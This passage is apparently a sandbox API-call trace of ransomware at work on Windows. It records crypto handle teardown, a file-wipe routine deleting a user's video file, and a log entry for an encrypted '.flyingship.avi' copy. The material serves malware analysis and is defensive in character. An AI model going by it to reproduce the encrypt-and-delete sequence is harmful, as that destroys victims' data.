| out: hHeap=0x8a0000) returned 1 [0197.742] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0197.742] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.742] CryptDestroyKey (hKey=0x90af98) returned 1 [0197.743] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0197.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0197.743] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0197.743] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0197.743] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0197.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.743] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.743] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.743] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.744] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0197.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.744] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.744] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0197.744] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.744] FreeLibrary (hLibModule=0x74f20000) returned 1 [0197.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0197.744] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0197.748] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0197.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0197.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.749] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87100690, ftCreationTime.dwHighDateTime=0x1d5debc, ftLastAccessTime.dwLowDateTime=0xd04bf290, ftLastAccessTime.dwHighDateTime=0x1d5df9f, ftLastWriteTime.dwLowDateTime=0xd04bf290, ftLastWriteTime.dwHighDateTime=0x1d5df9f, nFileSizeHigh=0x0, nFileSizeLow=0xab3a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="SuitfltgQdh7fZsjOO.avi", cAlternateFileName="SUITFL~1.AVI")) returned 0x90ae18 [0197.749] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0197.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0197.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0197.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0197.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.750] CharLowerBuffW (in: lpsz="byte[43834]", cchLength=0xb | out: lpsz="byte[43834]") returned 0xb [0197.751] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0197.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0197.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.751] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0197.751] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0197.751] FreeLibrary (hLibModule=0x75c90000) returned 1 [0197.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0197.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0197.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0197.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0197.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0197.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0197.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0197.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0197.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.770] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0197.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0197.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.770] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0197.770] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho\\suitfltgqdh7fzsjoo.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0197.771] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0197.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0197.771] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0197.771] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.772] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.772] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.772] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0197.772] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.772] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.772] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.773] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi", lpFilePart=0x0) returned 0x6e [0197.774] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87100690, ftCreationTime.dwHighDateTime=0x1d5debc, ftLastAccessTime.dwLowDateTime=0xd04bf290, ftLastAccessTime.dwHighDateTime=0x1d5df9f, ftLastWriteTime.dwLowDateTime=0x1acb3d80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xab3a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="SuitfltgQdh7fZsjOO.avi", cAlternateFileName="SUITFL~1.AVI")) returned 0x90ae18 [0197.774] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho\\suitfltgqdh7fzsjoo.avi")) returned 1 [0197.776] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87100690, ftCreationTime.dwHighDateTime=0x1d5debc, ftLastAccessTime.dwLowDateTime=0xd04bf290, ftLastAccessTime.dwHighDateTime=0x1d5df9f, ftLastWriteTime.dwLowDateTime=0x1acb3d80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xab3a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="SuitfltgQdh7fZsjOO.avi", cAlternateFileName="SUITFL~1.AVI")) returned 0 [0197.776] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0197.776] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.777] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0197.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0197.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0197.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0197.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0197.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0197.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0197.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0197.778] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0197.778] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0197.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0197.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0197.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.778] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0197.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0197.778] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0197.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0197.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.778] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0197.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0197.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0197.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0197.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0197.779] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0197.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0197.779] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0197.780] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.780] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0197.780] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.780] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0197.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0197.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.782] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0197.782] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3aa8, lpOverlapped=0x0) returned 1 [0197.782] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0197.782] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3aa8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.782] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0197.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0197.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0197.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.flyingship.avi\r\n", cchWideChar=124, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 124 [0197.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7c) returned 0x9c0c88 [0197.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.flyingship.avi\r\n", cchWideChar=124, lpMultiByteStr=0x9c0c88, cbMultiByte=124, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.flyingship.avi\r\n", lpUsedDefaultChar=0x0) returned 124 [0197.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0197.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0197.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0197.783] WriteFile (in: hFile=0x160, lpBuffer=0x9c0c00*, nNumberOfBytesToWrite=0x7b, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c0c00*, lpNumberOfBytesWritten=0x87f43c*=0x7b, lpOverlapped=0x0) returned 1 [0197.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0197.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.783] CloseHandle (hObject=0x160) returned 1 [0197.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0197.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0197.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0197.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0197.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.784] 